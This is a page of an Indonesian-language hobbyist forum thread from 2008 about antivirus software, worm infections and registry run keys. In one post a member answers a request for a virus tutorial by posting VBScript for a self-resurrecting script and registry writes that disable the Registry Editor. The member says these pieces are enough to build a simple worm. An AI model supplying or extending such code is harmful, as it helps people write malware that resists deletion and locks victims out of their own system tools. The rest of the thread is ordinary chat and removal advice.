Iklan

Tertarik untuk iklan?

Please Contact Admin

By PM or Email: gordhi@gmail.com

YM: don_gordhi

Poll

Bangga ga sama musik Indonesia?

64% 64% [ 27 ]
7% 7% [ 3 ]
29% 29% [ 12 ]

Total Suara : 42

User Yang Sedang Online
Total 5 uses online :: 0 Terdaftar, 0 Tersembunyi dan 5 Tamu

Tidak ada

[ View the whole list ]


User online terbanyak adalah 140 pada Thu Dec 02, 2010 3:37 pm

You are not connected. Please login or register

Antivirus lo apa?

Pilih halaman : Previous  1, 2, 3, 4  Next

Topik sebelumnya Topik selanjutnya Go down  Message [Halaman 2 dari 4]

26 Re: Antivirus lo apa? on Sat Feb 16, 2008 6:46 pm

iyaaa gt, kl mau nyegah viruz masuk, hal yg penting emang harus rada ngerti perintah2 dos, sama regedit, ngerti 2 ituu aja, bisa deh nyegah sama nanggulangi yg namanya worm,

Lihat profil user

27 Re: Antivirus lo apa? on Sat Feb 16, 2008 6:52 pm

Raexon


Pejuang Kumpul
cuman worm doank?? satu virus aja harus butuh tau banyak yah...gelo...

Lihat profil user

28 Re: Antivirus lo apa? on Sat Feb 16, 2008 7:02 pm

Scouzt


Balita
Balita
Heuheuehue hula aeverybody.......
I'm a newbie Very Happy
Ngomongin anti virus nih ye....ikut nimbrung aja!
Klo ane sih kagak pk yg penting handle file aja....
Klo da folder yg di hide n ga bisa diakses ntah tuh dah jadi virus pa file biasa aj enaknya sih pk AP so attributnya bs diubah Very Happy
Sorry om Gembz gw sotoy Very Happy klo mau jelasnya tanya ma um Gembz dy ahli virus malahan produsennya wekekekekek Very Happy

Lihat profil user

29 Re: Antivirus lo apa? on Sat Feb 16, 2008 7:06 pm

wedew apatuh si scoutz,,,, ubi di reagiin.... TAPE DEEEEEHHH

sapa bilang ahli bung, dah pensiun nih Very Happy eke

buka2 kartu aja nih SWT ah

Lihat profil user

30 Re: Antivirus lo apa? on Sat Feb 16, 2008 7:07 pm

Raexon


Pejuang Kumpul
salam kenal scouzt....semoga enjoy yah disini...

Lihat profil user

31 Re: Antivirus lo apa? on Sat Feb 16, 2008 7:13 pm

Scouzt


Balita
Balita
Lam knl juga Raexon....moga2 nih forum bakal segede YF Very Happy
Lanjuuuuuuuuuuuuuut...................;Wink

Lihat profil user

32 Re: Antivirus lo apa? on Sat Feb 16, 2008 7:25 pm

lanjut kemane bung pasar suci..... hihiy

btw dah ada yg tau ga viruz yg namanya Virtob.. itu kedeteksinya pake avast,, gatau tuh kl anti vir yang laen ngedetek namanya apaan???
ada yg pernah dapet gaaa????

Lihat profil user

33 Re: Antivirus lo apa? on Sat Feb 16, 2008 7:28 pm

Scouzt


Balita
Balita
Waduuuuuuuuh klo gw ga prnh spesifikasiin virusnya um maklum pemalas Very Happy
Yg penting keliatan mencurigakan gw embat alias delet pa lagi pk AP huuuuuuuh keliatan jelas virus apa bukannya heuheuheu Wink)
Btw ciri2nya kay gmn um?

Lihat profil user

34 Re: Antivirus lo apa? on Sat Feb 16, 2008 7:34 pm

Yaaa yang macem gitu sih worm doang mas,., gmana kl mallware yg laen...

nagh ini yg sekarang2 ini yg gw tak ngerti nih,, banyak banget skrng viruz tuh bukan ngeduplicate file, tapi malah bener2 nebeng di file,

gw kasih contohnya nih ya

kompie gw ada viruznya, waktu itu nama viruznya win32 virut

nah ada file extention exe yg blum pernah gw buka di kompie itu, ukuran filenya yaaah taro lah 2.5Mb, nah pas gw jalanin tuh filenya, ukuranya berubah jadi 2.8Mb,.... dan semuanya kaya gt, tapi programnya emang masih bisa di execute normal...

nah yg ogut tak ngertinya, gmana tuh ya cara kerjanya si viruz tuh, apa dya tulis ulang script di filenya, tp perasaan ga mungkin deh kaya gt...

adakah pencerahan???

Lihat profil user

35 Re: Antivirus lo apa? on Sat Feb 16, 2008 7:42 pm

Raexon


Pejuang Kumpul
@Scouzt, YF apa yah?

Lihat profil user

36 Re: Antivirus lo apa? on Sat Feb 16, 2008 7:50 pm

Scouzt


Balita
Balita
Mari kita bikin cerah....
Gt aja ga ngerti ga ngudeng [-( sama denk Very Happy
Kayanye ngeduplicate tuh um dy migrasi per script mungkin tuh juga hehehehhe Very Happy

Lihat profil user

37 Re: Antivirus lo apa? on Sat Feb 16, 2008 7:56 pm

Scouzt


Balita
Balita
@ Raexon
YF = YogyaFree um Very Happy

Lihat profil user

38 Re: Antivirus lo apa? on Sat Feb 16, 2008 7:58 pm

iya kl namanya ngeduplicate mungkin aja, tp kl nyisipin sricp di dalem file rasanya ga mungkin bgt deh... iya kan???

Lihat profil user

39 Re: Antivirus lo apa? on Sat Feb 16, 2008 10:25 pm

Scouzt


Balita
Balita
Ya mungkin aj dy bikin bundled information kaleee...kn bisa tuh..
Ato munkin dy bikin procedure baru n looping tiap execute heuheuheueu Very Happy

Lihat profil user

40 Re: Antivirus lo apa? on Sat Feb 16, 2008 10:34 pm

bundel information.... maksudnya?????

tp kl masalah looping tiap execute itu sih namanya worm mas,, kl worm, emang kaya gt prosedurnya, dya pasti looping terus,
nah makanya kl tentang worm, kl mau ngebantei viruznya harus di kill dulu processnya nah kl dah di kill prosessnya baru di utak atik lewat regeditnya

begitu lo mas

Lihat profil user

41 Re: Antivirus lo apa? on Sat Feb 16, 2008 10:47 pm

Scouzt


Balita
Balita
Ya di bundle so ngikut kaya bikin informasi tambahan file yg disisipinnya...
Oooooh gt toh tp yg jelas klo dah ngebantai executenya gmn?

Lihat profil user

42 Re: Antivirus lo apa? on Sat Feb 16, 2008 10:57 pm

yaaa disitu baru seninya, bung ngutak atik regeditnya,,,,,

dibutuhkan memang kreatifitas kita sendiri sih,,,,

informasi aja nih kan viruz tuh sama aja kaya program, dya bisa jalan kl ada yg ngejalanin, nah makanya yg pertama kali kita cari itu register bwat dya jalannya..

biasanya sih nyimpenya di HKCU\software\microsoft\windows\currentversion\run
HKCU\software\microsoft\windowsnt\currentversion\winlogon disitu byasanya sih dia simpen di shell explorer...

yaah itu sih cuma biasanya aja,, banyak banget prosed2nya gt bos


Lihat profil user

43 Re: Antivirus lo apa? on Sun Feb 17, 2008 12:29 am

bigie-x386


SMA Kelas 2
SMA Kelas 2
virus tuh dibkinnya dr apa c bozz... ko mac bsa kna virus kan g sma ma jendela???

Lihat profil user

44 Re: Antivirus lo apa? on Sun Feb 17, 2008 2:56 am

yaaa si obos,

gimana maksud dan tujuanya aja om,, mau bikin viruz di windows, linux, mac, ya toolsnya pasti beda2...
biasanya sih kl di windows rata2 pasti pake vb / vbs malah ada juga yg cuma pake batch file,, kalo yang laenya sih wa ga kaga tau, tak pernah pake OS laen sih selain 'Jendela'


study study

Lihat profil user

45 Re: Antivirus lo apa? on Sun Feb 17, 2008 1:50 pm

bigie-x386


SMA Kelas 2
SMA Kelas 2
bkin tutor buat vrusnya donk boz!!!
klo g mnta linknya donk Wink

Lihat profil user

46 Re: Antivirus lo apa? on Mon Feb 18, 2008 3:57 am

wew tutor ya,,,, ummm hihi gw share aja nih, cara bwat caching file deh ya ni yg sederhananya

nih gw kasih dikit codenya, n ni pake vbs, n bikinya di notepad ya

dim gez1, gez2,gez3
set gez1 = createobject("scripting.filesystemobject")
set gez2 = gez1.opentextfile(wscript.scriptfullname)
gez3 = gez2.readall
gez2.close
do
if gez1.fileexists(wscript.scriptfullname) = false then
set gez2 = gez1.createtextfile(wscript.scriptfullname)
gez2.write gez3
gez2.close
end if
loop



nah cobain deh tuh kasih nama n savenya vbs ya
nah sekarang coba running si filenya,, terus coba delete deh

hihi, tuh gw kasih tau yg standar bgt yaaa kl niat sih bisa di kembangin sendiri boz

kl mau macem2nya, itu paling maenin regeditnya
ummm, yaaa sudah lah gw lagi bae nih, gw kasih tau aja jalan bwat akses registry lewat vbs,,,, gini nih

yg ini bwat nulis di registry alias write di vbs

CreateObject("WScript.Shell").regwrite"HKCU\software\windows\" & _
"currentversion\policies\system\disableregistrytools",1,"REG_DWORD")


nah itu ceritanya bikin value type REG_DWORD dengan nama disableregistrytools dengan value = 1 alias true



yg ini bwat hapus registry

CreateObject("WScript.Shell").RegDelete"HKCU\Software\Microsoft\" & _ "Windows\CurrentVersion\Policies\System\DisableRegistryTools"

nah itu bwat ngapus registry dengan name disable registry tools

nah kl dah bisa ngutak ngatik beberapa contoh di atas bisa deh tuh bikin worm sederhana
hihi bwat pengetahuan doang kan ini. bkn bwat jailin orng...
cape dah gw nulis,,,


Shocked Shocked Shocked Shocked Shocked Shocked Shocked

Lihat profil user

47 Re: Antivirus lo apa? on Mon Feb 18, 2008 9:04 am

bigie-x386


SMA Kelas 2
SMA Kelas 2
seppp ntar ta coba boz' Idea

Lihat profil user

48 Re: Antivirus lo apa? on Mon Feb 18, 2008 9:09 am

wew,, tp tidak bertanggung jawab ya atas segala kerusakan dan kelalaiannya Very Happy

Lihat profil user

49 Re: Antivirus lo apa? on Mon Feb 18, 2008 9:22 am

bigie-x386


SMA Kelas 2
SMA Kelas 2
weis ndak opo2 to mazz, tp aku skg pke linux so gda registernnya Wink

Lihat profil user

50 Re: Antivirus lo apa? on Mon Feb 18, 2008 10:05 am

Kendaraan orang jogja..... Capedaaaaaah...

eh
eh
eh

bung Bigie, Btw kl setiap distro2 linux shell2nya sama apa beda,,

truz pernah nemuin ga viruz bwat linux,,

kl pernah nemuin tau ga, kl bikin viruz bwat linux byasanya pake tools/ applikasi apaan???

Lihat profil user

51 Re: Antivirus lo apa? Today at 11:03 pm

Sponsored content


Topik sebelumnya Topik selanjutnya Kembali Ke Atas  Message [Halaman 2 dari 4]

Pilih halaman : Previous  1, 2, 3, 4  Next

Similar topics

-

» Lima Antivirus!

Permissions in this forum:
Anda tidak dapat menjawab topik